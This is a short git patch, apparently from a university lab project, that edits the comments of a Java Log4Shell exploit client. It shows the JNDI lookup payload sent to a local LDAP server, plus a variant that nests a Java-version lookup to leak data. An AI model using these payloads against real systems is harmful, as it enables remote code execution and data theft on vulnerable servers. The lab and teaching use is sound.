From 811f716da18f9e2a47dd1bbe5c642d7eaf933383 Mon Sep 17 00:00:00 2001
From: Lukas Arnold <lukas.arnold@stud.tu-darmstadt.de>
Date: Wed, 22 Jun 2022 17:23:18 +0200
Subject: [PATCH] Adds more details about the string sent by the exploit

---
 .../src/main/java/de/seemoo/netsec/Log4ShellClient.java  | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
index b432113..4cbf8b6 100644
--- a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
+++ b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java
@@ -23,8 +23,15 @@ public class Log4ShellClient {
 
             // Sends the malicious message to trigger the remote code execution.
             // The message references to the LDAP server simultaneously running on port 389.
-            // Vulnerable Log4J version will contact it and download malicious class files.
+            // A vulnerable Log4J version will contact it and download malicious class files.
             // It is important to put any string after the last slash, otherwise the attack won't work.
+
+            // Furthermore, it is also possible to replace 'anytext' with even more lookups.
+            // They will be evaluated before the request is sent to the LDAP server.
+            // Henceforth, one can send the string '${jndi:ldap://127.0.0.1:389/${java:version}}' which first
+            // evaluates the Java version and then sends the LDAP request.
+            // See: https://logging.apache.org/log4j/2.x/manual/lookups.html
+
             writer.println("${jndi:ldap://127.0.0.1:389/anytext}");
 
             writer.close();
-- 
GitLab